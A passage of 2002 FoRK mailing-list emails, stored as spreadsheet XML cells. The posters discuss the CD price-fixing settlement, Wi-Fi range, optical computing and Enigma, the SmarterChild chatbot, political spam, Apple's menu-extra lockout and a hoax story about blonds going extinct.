Remaindered at my local Barnes &amp; Ignoble.   The historical reference 
material is useful.Eirikur
</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net wrote:&gt; Turns out the music industry settled ... quite a hefty
&gt; settlement.
Funnky, I thought that it was minor in comparison the the gouging that 
occurs on a standard CD.
&gt; The Wall Street Journal
&gt; Copyright (c) 2002, Dow Jones &amp; Company, Inc.
&gt; Tuesday, October 1, 2002
&gt; 
&gt; Five Music Concerns To Pay $143.1 Million In Price-Fixing Case
&gt; Reuters News Service ...
&gt; The companies, which didn't admit any wrongdoing, will pay $67.4
&gt; million in cash to compensate consumers who overpaid for CDs between
&gt; 1995 and 2000. The companies also agreed to distribute $75.7 million
&gt; worth of CDs to public entities and nonprofit organizations throughout
&gt; the country.
The CDs will probably cost less than 7.5 million to produce and 
distribute... "didn't admit any wrongdoing"?!? Give me a break.
Elias</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Elias,Tuesday, October 1, 2002, 9:54:02 PM, you wrote:E&gt; bitbitch@magnesium.net wrote:&gt;&gt; Turns out the music industry settled ... quite a hefty
&gt;&gt; settlement.
E&gt; Funnky, I thought that it was minor in comparison the the gouging that 
E&gt; occurs on a standard CD.
&gt;&gt; The Wall Street Journal
&gt;&gt; Copyright (c) 2002, Dow Jones &amp; Company, Inc.
&gt;&gt; Tuesday, October 1, 2002
&gt;&gt; 
&gt;&gt; Five Music Concerns To Pay $143.1 Million In Price-Fixing Case
&gt;&gt; Reuters News Service ...
&gt;&gt; The companies, which didn't admit any wrongdoing, will pay $67.4
&gt;&gt; million in cash to compensate consumers who overpaid for CDs between
&gt;&gt; 1995 and 2000. The companies also agreed to distribute $75.7 million
&gt;&gt; worth of CDs to public entities and nonprofit organizations throughout
&gt;&gt; the country.
E&gt; The CDs will probably cost less than 7.5 million to produce and 
E&gt; distribute... "didn't admit any wrongdoing"?!? Give me a break.
E&gt; EliasToobad none of this will go back to any of the people who were forced
to pay the rates.
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">At 10:27 PM -0700 on 9/30/02, Mr. FoRK wrote:
&gt; I realize now, that after reviewing the past several years of work and
&gt; career, I have been in the wrong business. The wrong business.
&gt;
&gt; This is what I should have been doing.
&gt;
&gt; http://www.rathergood.com/vikings/A New Manual has been published:Or, the one I read...
 And, of course, the open source versions...http://users.ev1.net/~theweb/njaltoc.htmhttp://sunsite.berkeley.edu/OMACL/Njal/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</si>
  <si>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I think what you're looking at with the dual antenna mounts is a 
diversity antenna.  It won't work too well with one hooked up to the 
pringles can and the other hooked up to a regular rubber duck.-Ian.
On Tuesday, October 1, 2002, at 01:04 PM, Eugen Leitl wrote:&gt;
&gt; 1) reinforced concrete shields like the dickens; wood lots less so
&gt; 2) line of sight is best (o'really?)
&gt; 3) if you want to boost range, use directional aerials, not omnis
&gt;
&gt; Direct line of sight (no trees, no nothing) can give you ~10 km with 
&gt; well
&gt; aligned directional aerials (and, say, no sleet, no locusts, nor rain 
&gt; of
&gt; blood). If you want to fan out afterwards, use a bridge of a 
&gt; directional
&gt; coupling to an omni. 802.11a should shield within building lots more 
&gt; than
&gt; 802.11b, ditto line of sight with lots of precipitation inbetween.
&gt;
&gt; On Tue, 1 Oct 2002, Damien Morton wrote:
&gt;
&gt;&gt; I just bought a LinkSys BEFW1154v2 Access Point Router for $150
&gt;&gt; (http://www.linksys.com/products/product.asp?grid=22&amp;prid=415). Im 
&gt;&gt; doing
&gt;&gt; some dev work on a Symbol PocketPC device with built in 802.11b.
&gt;&gt;
&gt;&gt; In this 600 sq ft pre-war New York apartment it goes through 2 or 3
&gt;&gt; walls, into the hallway and halfway down the first flight of stairs
&gt;&gt; before it loses contact with the base station. That's less than 50 ft.
&gt;&gt; Inside the apartment, it works just fine.
&gt;&gt;
&gt;&gt; I just did some further testing - through 2 brick walls the range is
&gt;&gt; about 25 feet. The signal also goes through the roof pretty much
&gt;&gt; unimpeded.
&gt;&gt;
&gt;&gt; That said, the Symbol device doesn't have an antenna to speak of, and 
&gt;&gt; I
&gt;&gt; havent done any tweaking to try to extend the range.
&gt;&gt;
&gt;&gt; The Linksys unit has two antenna mounts - you could leave one as an 
&gt;&gt; omni
&gt;&gt; antenna while hooking up a directional antenna to the other.
&gt;&gt;
&gt;&gt; You might find that you have to use several access points and/or
&gt;&gt; repeaters to get the coverage you want.
</t>
  </si>
  <si>
    <t xml:space="preserve">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harder.See "The Code Book" by Singh, Doubleday, 1999.     Or, for that matter, 
"Cryptonomicon" by Stephenson, which is a fictionalization of the Enigma 
cracking story, and pretty accurate.I eventually get born as a side-effect of the Battle of Britain, you 
see....Computing with interference patterns, etc, makes perfect sense, but Enigma 
was cracked by building mechanical systems that were essentially Enigma 
machines and brute-forcing.Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">That's what the manual said - a diversity antenna.Why wouldn't it work well with one omni and one directional antena? IANAEE, but doesn't that count as diversity?&gt; -----Original Message-----
&gt; From: Ian Andrew Bell [mailto:fork@ianbell.com] 
&gt; Sent: Tuesday, 1 October 2002 23:23
&gt; To: Eugen Leitl
&gt; Cc: Damien Morton; tomwhore@slack.net; fork@spamassassin.taint.org
&gt; Subject: Re: Wifi query
&gt; 
&gt; 
&gt; 
&gt; I think what you're looking at with the dual antenna mounts is a 
&gt; diversity antenna.  It won't work too well with one hooked up to the 
&gt; pringles can and the other hooked up to a regular rubber duck.
&gt; 
&gt; -Ian.
&gt; 
&gt; 
&gt; On Tuesday, October 1, 2002, at 01:04 PM, Eugen Leitl wrote:
&gt; 
&gt; &gt;
&gt; &gt; 1) reinforced concrete shields like the dickens; wood lots less so
&gt; &gt; 2) line of sight is best (o'really?)
&gt; &gt; 3) if you want to boost range, use directional aerials, not omnis
&gt; &gt;
&gt; &gt; Direct line of sight (no trees, no nothing) can give you ~10 km with
&gt; &gt; well
&gt; &gt; aligned directional aerials (and, say, no sleet, no 
&gt; locusts, nor rain 
&gt; &gt; of
&gt; &gt; blood). If you want to fan out afterwards, use a bridge of a 
&gt; &gt; directional
&gt; &gt; coupling to an omni. 802.11a should shield within building 
&gt; lots more 
&gt; &gt; than
&gt; &gt; 802.11b, ditto line of sight with lots of precipitation inbetween.
&gt; &gt;
&gt; &gt; On Tue, 1 Oct 2002, Damien Morton wrote:
&gt; &gt;
&gt; &gt;&gt; I just bought a LinkSys BEFW1154v2 Access Point Router for $150 
&gt; &gt;&gt; (http://www.linksys.com/products/product.asp?grid=22&amp;prid=415). Im 
&gt; &gt;&gt; doing some dev work on a Symbol PocketPC device with built in 
&gt; &gt;&gt; 802.11b.
&gt; &gt;&gt;
&gt; &gt;&gt; In this 600 sq ft pre-war New York apartment it goes 
&gt; through 2 or 3 
&gt; &gt;&gt; walls, into the hallway and halfway down the first flight 
&gt; of stairs 
&gt; &gt;&gt; before it loses contact with the base station. That's less than 50 
&gt; &gt;&gt; ft. Inside the apartment, it works just fine.
&gt; &gt;&gt;
&gt; &gt;&gt; I just did some further testing - through 2 brick walls 
&gt; the range is 
&gt; &gt;&gt; about 25 feet. The signal also goes through the roof pretty much 
&gt; &gt;&gt; unimpeded.
&gt; &gt;&gt;
&gt; &gt;&gt; That said, the Symbol device doesn't have an antenna to 
&gt; speak of, and
&gt; &gt;&gt; I
&gt; &gt;&gt; havent done any tweaking to try to extend the range.
&gt; &gt;&gt;
&gt; &gt;&gt; The Linksys unit has two antenna mounts - you could leave one as an
&gt; &gt;&gt; omni
&gt; &gt;&gt; antenna while hooking up a directional antenna to the other.
&gt; &gt;&gt;
&gt; &gt;&gt; You might find that you have to use several access points and/or 
&gt; &gt;&gt; repeaters to get the coverage you want.
&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.quitpalestine.org./Funny as all hell.  So a group of 25 QUIT (Queers Undermining Israeli
Terrorism) marched into the local starbucks in Berkeley (Of course,
they pick a safe city like Berkeley, but hey, still funny) and
'settle' driving away straights and other prior inhabitants with
supersoakers :)Incredibly creative, in my opinion. Not terribly violent (I mean, how
much damage can you -really-  do with a supersoaker?) but definintely
a newscatcher.Its nice to see folks are finding some creative means to make a point.
 Even if you don't -agree- with it, its a hard sell to say that this
 has been done before.-- 
Best regards,
 bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t>Kind of interesting application of 'agent' technology.
A mix of telnet and Eliza?
(wonder if KnowNow needs this as a partner...)==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constituents.ActiveBuddy technology is proven in the marketplace by the smash success of
SmarterChild, ActiveBuddy's showcase interactive agent launched in June 2001
and visited by over 8 million consumers in its first year of life.Interactive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'SmarterChild'):Mike says:
how are you?SmarterChild says:
Great thx! You?Mike says:
Fine. What is the weather like in seattle?SmarterChild says:
Current weather conditions for Seattle, WA:Currently: 57 F
Condition: Few Clouds
Real Feel: 57 F
Dewpoint: 44
Humidity: 62 %
Visibility: 10 mi
Wind: N/0 mphNext time, just type "weather seattle, wa."To get the forecast for Seattle, WA, just type "forecast."</t>
  </si>
  <si>
    <t xml:space="preserve">MF&gt; Here is a sample conversation on (MSN Messenger with 'SmarterChild'):MF&gt; Mike says:
MF&gt; how are you?MF&gt; SmarterChild says:
MF&gt; Great thx! You?Oh freaking great.  In their adoption to make it 'more human' they
have to add in all the broken english and shortened AOL-style
phrasings.  YAY.Next thing you know, the AI will be asking for ASL...Evil.
</t>
  </si>
  <si>
    <t xml:space="preserve">
This is something new, or at least new to me:     Politspam (n): Using a spam engine for political purposes.In this particular case, to get back at the University of Groningen.
The content suggests its more prank than vigilante activism (in the
old days we used to say "someone left their terminal unguarded")
but what's interesting is that it's not trying to sell me anything
or lead me to any for-fee service, it's just trying to spread
a meme that RUG is evil.&gt;&gt;&gt;&gt;&gt; "w" == wpin   writes:    w&gt; Those who want to leave for the Netherlands to carry on any
    w&gt; kind of education,including for PHD, must be careful
    w&gt; . Especially the university of Groningen(RUG) should be
    w&gt; avoided. This university was once a good one but now it has
    w&gt; lost its reputation. ... Studying is a good investment in time
    w&gt; and money. So invest in the right place and time. You are
    w&gt; warned.    w&gt; Sincerely yours,
    w&gt; hyohxsycjlakdbmhjpiouupngoqrmHas anyone else started to receive either consumer vigilante or
political activism messages via spam methods?-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
How is this any different from attaching an Infobot or A.L.I.C.E
through licq's console-hook?  People have been doing that for years,
and for over a decade in IRC and the MUDs.... and the one thing I think we've learned in all that time is that,
as a help-desk, it doesn't work.  People just don't like talking to
robots, especially when the robots, once confused, become imbeciles.
I think the humans may feel cheated, deceived and tricked when they
discover, as with the Seattle answer, that they are talking to a
machine; there's no real intelligence behind that simulated-friendly
and therefore empty 'thx'.AIML is clever and cute, but for /practical/ applications as a first
line of technical support?  It's been tried over and over, and while I
/also/ think that it /should/ work, for the most part, people won't
use it.  What's worse, as we make the NL processing more and more
clever, it only means it fails more dramatically; ALICE doesn't just
stumble a bit, it starts to drool.  And ALICE is the best we have.Like a Dalek: All very impressive when things are going well, but all
it takes to betray the chicken-brain inside is a towel over it's
ill-placed eye, or a spin off the metal surface ;)In all the prolog-based NL database query systems of the 1980's and
other later chatterbot helpdesk projects like Shallow Red, even
simpler tries like Ask Jeeves, people very quickly know they're
talking to a robot, and the queries anneal to short, truncated and
terse database-like verb-noun or just noun-keyword requests.  People are just too quick to adapt, and too impatient to forgive a
clunky interface, and for now, especially when the /average/ computer
user still can't type more than maybe 5-10wpm, NL is a painfully slow
clunky interface.Put it this way: Would you login, wake the bot and ask for the Seattle
weather, or would you do as we /all/ do and just click the weather
icon sitting there on your desktop?Just for fun, here's an interesting conversation between Shallow Red,
ALICE and Eliza as they decide to play the Turing Game:http://www.botspot.com/best/12-09-97.htm-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
Wow, if they put a VRML front end on it it would be 100% worthless rather
than just 99%IRC...Bots....scripts.....been there done that and much better.If these folks actualy saw the xddc instafilesharing scripts must 12 year
olds hang off of Mirc  they might get a clue, then again they might
already have teh clue that sometimes you can packege the obvious and sell
it to the clueless.</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "Gary Lawrence Murphy" &gt;
&gt; &gt;&gt;&gt;&gt;&gt; "w" == wpin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warned.Dear gawd - 'lost its reputation' - how horrible for those Northern
Europeans. What could possibly be worse than that?
</t>
  </si>
  <si>
    <t xml:space="preserve">
let me put it /another/ way ...    f&gt; Mike says: how are you?
    f&gt; SmarterChild says: Great thx! You?
    f&gt; Mike says: Fine. What is the weather like in seattle?
    f&gt; SmarterChild says: Current weather conditions for Seattle, WA:Out of 8 /million/ alledged visitors, this is the /best/ example???-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Date: Wed, 02 Oct 2002 01:30:24 -0400
From: "John S. Denker" 
Subject: Re: Optical analog computing?
Sender: jsd@no.domain.spam
To: "R. A. Hettinga" 
Cc: Digital Bearer Settlement List ,
 cryptography@wasabisystems.com"R.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loop?1Gimme a break.  This is remarkable for its lack of
newsworthiness.1) Bletchley Park used optical sensors, which were (and
still are) the best way to read paper tape at high speed.
You can read about it in the standard accounts, e.g.
  http://www.picotech.com/applications/colossus.html2) For decades before that, codebreakers were using optical
computing in the form of superposed masks to find patterns.
You can read about it in Kahn.3) People have been doing opto-electronic computing for
decades.  There's a lot more to it than just holography.
I get 14,000 hits from
  http://www.google.com/search?q=optical-computing&gt; Optical info is a complex-valued wave (spatial frequency, amplitude and
&gt; phase)It isn't right to make it sound like three numbers (frequency,
amplitude, and phase);  actually there are innumerable
frequencies, each of which has its own amplitude and phase.&gt; lenses, refractions, and interference are the computational operators.
&gt; (add, copy, multiply, fft, correlation, convolution) of 1D and 2D arrays
&gt;
&gt; and, of course, massively parallel by default.
&gt;
&gt; and, of course, allows free-space interconnects.Some things that are hard with wires are easy with
light-waves.  But most things that are easy with wires
are hard with light-waves.&gt; Here's a commercialized effort from israel: a "space integrating
&gt; vector-matric multiplier"  [ A ] B = [ C ]
&gt; laser-&gt; 512-gate modulator -&gt; spread over 2D
&gt; "256 Teraflop equivalent" for one multiply per nanosecond.People were doing smaller versions of that in
the 1980s.&gt; Unclassified example: acousto-optic spectrometer, 500 Gflops equivalent
&gt; (for 12 watts!) doing continuous FFTs.  Launched in 1998 on a 2-year
&gt; mission. Submillimeter wave observatory.Not "FFTs".  FTs.  Fourier Transforms.  All you need for
taking a D=2 Fourier Transform is a lens.  It's undergrad
physics-lab stuff.  I get 6,000 hits from:
  http://www.google.com/search?q=fourier-optics&gt; Of course, the rest of the talk is about the promise of moving from
&gt; optoelectronic to all-optical processors (on all-optical nets &amp; with
&gt; optical encryption, &amp; so on).All optical???  No optoelectronics anywhere???
That's medicinal-grade pure snake oil, USP.Photons are well known for not interacting with
each other.  It's hard to do computing without
interactions.---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</si>
  <si>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 Original Message -----
From: "Gary Lawrence Murphy" &gt; ... and the one thing I think we've learned in all that time is that,
&gt; as a help-desk, it doesn't work.
I'm not sure they are doing strictly help-desk stuff.
But the whole 'who in their right mind would use that? it doesn't have all
these cool features!' isn't always a guarantee of failure - maybe there is a
strength in this approach (agents and/or IM as ui) than can find a nich
application space.&gt;
&gt; In all the prolog-based NL database query systems of the 1980's and
&gt; other later chatterbot helpdesk projects like Shallow Red, even
&gt; simpler tries like Ask Jeeves, people very quickly know they're
&gt; talking to a robot, and the queries anneal to short, truncated and
&gt; terse database-like verb-noun or just noun-keyword requests.
Kind of like a web query - and with google, someone else can turn them into
a link so you don't even have to type anything.&gt;
&gt; People are just too quick to adapt, and too impatient to forgive a
&gt; clunky interface, and for now, especially when the /average/ computer
&gt; user still can't type more than maybe 5-10wpm, NL is a painfully slow
&gt; clunky interface.
Yes - true true.&gt;
&gt; Put it this way: Would you login, wake the bot and ask for the Seattle
&gt; weather, or would you do as we /all/ do and just click the weather
&gt; icon sitting there on your desktop?
What about a situation where you don't directly ask/talk to the bot, but
they listen in and advise/correct/interject/etc?
example: two people discussing trips, etc. may trigger a weather bot to
mention what the forecast says - without directly being asked.
</t>
  </si>
  <si>
    <t>802.11b - 11Mbps per channel over three channels in the 2.4GHz range 
(also shared with microwaves and cordless phones) at rages up to ~300 ft.
802.11a runs on 12 channels in the 5GHz range and up to around five 
times more bandwidth (~54Mbps or so) but has less range (60-100 ft). 
8021.11a also adds Forward Error Correction into the scheme to allow for 
more reliable data transmission.
Which to use really depends on what you're doing with it. Streaming 
video almost necessitates 802.11a, while streaming just audio can be 
comfortably done with 802.11b provided that there isn't much 
interference or too many clients.
Prices? Don't know... Haven't done the research. For covering a large 
area 802.11a will be more expensive due to the need for more APs. If you 
want to reach the local coffee shop, however, you will need a 
directional antenna either way.Check out http://www.80211-planet.com, they've got some good articles on 
802.11... Also, some of the best info on 802.11 security I've seen can 
be found at http://www.drizzle.com/~aboba/IEEE/.
Give me bandwidth or give me death,
Elias
Tom wrote:&gt;... I have one very pressing question.... Wifi ranges.. ...
&gt;
&gt;Do I got for 802.11b stuff or do I gold out for 802.11a ? Is the price
&gt;point break goign to warrant the differnce?
&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Delivered-To: fork@spamassassin.taint.org
To: fork@spamassassin.taint.org
Subject: Re: Optical analog computing?
From: Dave Long 
Sender: fork-admin@xent.com
Date: Wed, 02 Oct 2002 11:09:34 -0700&gt; &gt; "the first computer to crack enigma was optical"
&gt;
&gt; Computing with interference patterns, etc, makes perfect sense, but Enigma
&gt; was cracked by building mechanical systems that were essentially Enigma
&gt; machines and brute-forcing.Look for "Zygalski sheets".By Koerner's* narrative, it wound up
being a hybrid affair: Bletchley had
mock Enigmas which cycled through the
Enigma's ~18k starting positions in a
quarter of an hour, but the Germans
started using a plugboard which then
had ~1.5x10^14 possibilities.  The
Poles noticed that there were some
patterns in the messages which were
only possible via certain plugboard
settings, and so:&gt; When we have collected several such cards corresponding to different
&gt; initial signals ..., we place them in a pile so that the squares
&gt; corresponding to the same daily settings are aligned and shine a
&gt; light beneath the pile.  Only those squares which let the light
&gt; through will correspond to possible daily settings.So the brute force hardware allowed
precalculation of "optical" computing
devices which then narrowed down the
possibilities enough for brute force
to again be used for daily decodes,
until:&gt; On 10 May, the Germans invaded France and, on the same day, in
&gt; accordance with the best cryptographic principles, they changed their
&gt; Enigma procedures in such a way that the 1560 Zygalski sheets, each
&gt; with their carefully drilled 1000 or so holes, became just so much
&gt; waste cardboard.-Dave::::::&gt; &gt; "the first synthetic-aperture-radar processor was optical"This is also easy to believe, given Dr.
Elachi's description of the 1981 Shuttle
Imaging Radar:&gt; The received signal is recorded on an optical film which is retrieved
&gt; after landing.  The film ... is then processed in an optical correlator
&gt; to generate the final image.which makes sense, as one wishes to shift
each component of the return in proportion
to its frequency, for which one presumably
needs a glorified prism.&gt; Alternatively, the ... signal can be digitized and then recorded on
&gt; board or transmitted to the ground via a digital data link.  This was
&gt; the case with the ... sensor flown in 1984.::::::* Koerner, _The Pleasures of Counting_,
in which various aspects of the Enigma
decoding cover four chapters, of which
I quote from two sections of one:
14.2: Beautiful Polish females, and
14.3: Passing the torch
&gt; Churchill's romantic soul loved the excitement and secrecy surrounding
&gt; Bletchley.  He relished the way that
&gt; &gt; [t]he old procedures, like the setting up of agents, the suborning
&gt; &gt; of informants, the sending of messages written in invisible ink,
&gt; &gt; the masquerading, the dressing-up, the secret transmitters, and the
&gt; &gt; examining of the contents of waste-paper baskets, all turned out
&gt; &gt; to be largely cover for this other source, as one might keep some
&gt; &gt; old-established business in rare books going in order to be able,
&gt; &gt; under cover of it, to do a thriving trade in pornography and erotica
&gt; ...
&gt; Looking at the disparate, unkempt and definitely unmilitary crew
&gt; formed by his top code-breakers, he is said to have added to his head
&gt; of Intelligence "I know I told you to leave no stone unturned to find
&gt; the necessary staff, but I did not mean you to take me so literally!"---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</si>
  <si>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 Original Message ----- 
From: "Gary Lawrence Murphy"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weather?Have you ever worked with Kragen?
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message ----- 
From: "Mr. FoRK" &gt; ----- Original Message ----- 
&gt; From: "Gary Lawrence Murphy" 
&gt; 
&gt; &gt; 
&gt; &gt;     f&gt; What about a situation where you don't directly ask/talk to the
&gt; &gt;     f&gt; bot, but they listen in and advise/correct/interject/etc?
&gt; &gt; 
&gt; &gt; Do you do that?  Do you hear two people at the next table say "I'm
&gt; &gt; going to Seattle tomorrow" and you just /have/ to lean over and
&gt; &gt; interject compulsively to tell them what you know about Seattle's
&gt; &gt; weather?
&gt; 
Oh, please, quit with all that StopEnergy(tm)
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Date: Thu, 03 Oct 2002 03:21:05 +1000
To: "John S. Denker" 
From: Greg Rose 
Subject: Re: Optical analog computing?
Cc: "R. A. Hettinga" ,
   Digital Bearer Settlement List ,
   cryptography@wasabisystems.comAt 01:30 AM 10/2/2002 -0400, John S. Denker wrote:
&gt;"R. A. Hettinga" wrote:
&gt;...
&gt; &gt; "the first computer to crack enigma was optical"
&gt;1) Bletchley Park used optical sensors, which were (and
&gt;still are) the best way to read paper tape at high speed.
&gt;You can read about it in the standard accounts, e.g.
&gt;   http://www.picotech.com/applications/colossus.htmlBut Colossus was not for Enigma. The bombes used for Enigma were
electro-mechanical. I'm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all.Greg.Williams/Zenon 2004 campaign page: http://www.ben4prez.orgGreg Rose                                       INTERNET: ggr@qualcomm.com
Qualcomm Australia          VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199
Level 3, 230 Victoria Road,                http://people.qualcomm.com/ggr/
Gladesville NSW 2111    232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C---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</si>
  <si>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Elias Sinderson wrote:
&gt; 802.11b - 11Mbps per channel over three channels in the 2.4GHz range 
&gt; (also shared with microwaves and cordless phones) Microwaves, cordless phones and video-based baby monitors....Greg-- 
Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
gbolcer at endeavors.com  | http://endeavors.com
Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2 Oct 2002, Gregory Alan Bolcer wrote:
--]Elias Sinderson wrote:
--]&gt; 802.11b - 11Mbps per channel over three channels in the 2.4GHz range
--]&gt; (also shared with microwaves and cordless phones)
--]
--]Microwaves, cordless phones and video-based baby monitors....Well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chai.Which brings me to the fact that finding a good Convection only (not combo
with a microwaver) oven of any good size is dang near impossible unless
you go up to the bizness sizes. thankfully there is Dehlongi of which
costco has thru thier online store.Now of course the question is do we get it delivered to the old house or
the new one (yep we got our offer approved and are in the short run down
to a long mortage:)  we close on oct 31. though the realestate agent says
t happens like that a lot, I still find it incrediably jolting to have
found a house inthe hood I want with the space dawn wants on sunday and we
are signing papers on tuesday night with a close at the end of the month.Which of course means....wifi land for wsmf:)- )So far I like the Linksys dsl/cable router all in one wifi ap. The Dlink
has the funky 22mb stuff IF you use all thier stuff across the net and the
way things go I cant say thats gonna happen for sure. Pluse the Linksys
stuff is all over the mass market sotres so I cna walk home with parts at
any time.The fun now comes with a realization that with ATTbi cable as my main hose
tot he net offering up bwf might be a tad problematic....So i am thinking
of ways around/through/under that. the setup of the particualrs are far
form set in stone...any ideas would be welcome.Also any portlanders.....party time.
-tom
</t>
  </si>
  <si>
    <t xml:space="preserve">At 4:34 PM -0400 on 10/2/02, R. A. Hettinga wrote:
&gt; --- begin forwarded text
&gt;
&gt;
&gt; Status: RO
&gt; Delivered-To: fork@spamassassin.taint.orgSigh. Shoot me, now...My apologies.Cheers,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</si>
  <si>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
Over on Arstechnica (www.arstechnica.com) I saw mention of a Wired article
that goes into the many wonderfull ways Apple is showing its love and
respect for its users.http://www.wired.com/news/mac/0,2125,55395,00.htmlThere is a good rundown of all the whys and whatfores over at
http://arstechnica.com/reviews/02q3/macosx-10.2/macosx-10.2-5.html"True to form, industrious third party developers saw that they could gain
a competitive advantage by supporting this more capable user interface in
their applications. Apple's private menu extras APIs were reverse
engineered and leveraged to great effect. The architecture was so popular
that an application for managing predefined sets of menu extras (third
party or otherwise) was in development.All of that changed with the release of Jaguar--but not because the
private APIs had changed. If they had, third party developers would have
updated their applications to work with the new APIs, as they have
resigned themselves to doing by choosing to use private APIs in the first
place.But what actually happened in Jaguar was that Apple added code to forcibly
exclude all non-Apple menu extras. Other parts of the API did not change.
But when a menu extra is loaded, it is compared to a hard-coded list of
"known" menu extras from Apple. If the menu extra is not on that list, it
is not allowed to load.It's easy to laugh at Steve Ballmer's sweat-soaked gyrations as he chants
"developers, developers, developers!", but Microsoft clearly understands
something that Apple is still struggling with. It is in a platform
vendor's best interest to encourage development for its platform. In
Apple's case, this doesn't mean that they have to bend over backwards to
make every single system service and UI element "pluggable" via public
APIs. That's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decisions.But for Apple to go out of its way--to actually expend developer
effort--to stop these third party developers, while still failing to
provide a supported alternative, is incredibly foolish. "</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
has been sent to you by khare@alumni.caltech.edu.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Emulex...Enjoy!
  Rohitkhare@alumni.caltech.edu
Stop Those Presses! Blonds, It Seems, Will Survive After AllOctober 2, 2002
By LAWRENCE K. ALTMAN 
 Apparently it fell into the category "too good to check."
Last Friday, several British newspapers reported that the
World Health Organization had found in a study that blonds
would become extinct within 200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"W.H.O.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 "a
blonde-shell study," as The Daily Star of London put it.
But none reported any scientific details from the study or
the names of the scientists who conducted it. On "Good Morning America," Charles Gibson began a
conversation with his co-anchor, Diane Sawyer, by saying:
"There's a study from the World Health Organization, this
is for real, that blonds are an endangered species. Women
and men with blond hair, eyebrows and blue eyes, natural
blonds, they say will vanish from the face of the earth
within 200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Britain's domestic news agency. "Several papers picked it
up," he said. But Charlotte Gapper, night editor at The Press
Association, said that although it had considered running
the report on Sept. 27, it had decided not to after talking
to the World Health Organization. "We didn't do that story because we made an inquiry to the
World Health Organization first," she said. "They told us
that report was two years old, and had been covered at the
time. They said it had been picked up again that day by a
German news agency." She added that she did not know which agency the
organization was referring to. Dr. Ray White, a geneticist at the University of California
at San Francisco, said that the disappearance of a gene for
blond hair "sounds patently incorrect."http://www.nytimes.com/2002/10/02/health/02BLON.html?ex=1034599071&amp;ei=1&amp;en=3a0e4f0b2b251593HOW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t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson  writes:    E&gt; ...  If my environment cannot be made beautiful, in
    E&gt; some sense I cannot live.  "The first question I ask myself when something doesn't seem to be
  beautiful is why do I think it's not beautiful. And very shortly you
  discover that there is no reason." -- John Cage-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
Well it looks pretty much 99% sure that we will be moving in on Nov 1 to
the new house. I think the only thing that stops us now are acts of
dieties and total economic collapse..so no one mention the dow for the
next few weeks..In preperation we drove to Best Buy tonight and picked up the test core
for the wifi net. I got a linksys BEFW11S4(1) for the router/hub/wireless
ap/firewall/etc and a linksys wifi pcmcia card for the laptopI made one false move so it took about 30 mins all told to set up the
card, the router, and the other 3 machines in the house on the wire ether
hub. All vfery neat very easy and very very cool set up via the
webinterface. I have to dig into the firewall/nat/routing features some
more (i have been reading up the wifi security blackpaper on ars technica)
but all in all a smooth move.
Now the place im at now, the house soon to be the ex house, has lots of
funky things going on in the walls and in the area. We are in ,
essentialy, a gravel pit..recption of all types suck and transmisions get
goofy inside the pit.  That being said... with 2 walls and 40 feet between
the AP and the pcmica card (no external antena on it) Im still getting
11mbs and at least 60% goodness.
Some cool things about the new house...its a 1912 job so no metal works
inthe walls to speak of , mostly wood and plaster. We dont have a
microwave and our cordless phines are on 900mhz (yea so I can use my bear
cat to listen in on some calls, with kids in the house is that such a bad
thing? Ben or heather, if you read this years from now...well by then I
hope youare better at countermoeasures:)- )Ok, enough testing for tonight. I gota say, being able to do this in bed
by vncing via wifi to my desktop is a blast...oh no...wifes pillow is
heading this way....DUCKKKKK
(1)http://www.linksys.com/Products/product.asp?grid=23&amp;prid=173
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 02 October 2002 06:37 pm, Tom wrote: 
&gt; But what actually happened in Jaguar was that Apple added code to
&gt; exclude all non-Apple menu extras.Too, too, too, true.  Just you try to muck with Job's blessed Aqua 
interface.   Or remove the fscking dock.  OSX is such a step down from 
Classic with Kaleidoscope skinning the entire UI.  As an artist, I resent 
it deeply.   (This is not in praise of Classic.)  If my environment cannot 
be made beautiful, in some sense I cannot live.Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Thu, 03 Oct 2002 07:56:39 +0100
Subject: The 3rd Annual Consult Hyperion Digital Identity Forum
From: "David G.W. Birch" 
To: Bob Hettinga 
Cc: Digital Bearer Settlement List Dear All,See www.digitalidentityforum.com for more details. Speakers include
Microsoft and Liberty Alliance, UK central and local government, law
enforcement, financial services (Egg and RBS/NatWest), EC Research Centre, a
psychologist and others. Look forward to seeing you there.Regards,
Dave Birch.-- 
-- David Birch, Director, Consult Hyperion
-- 
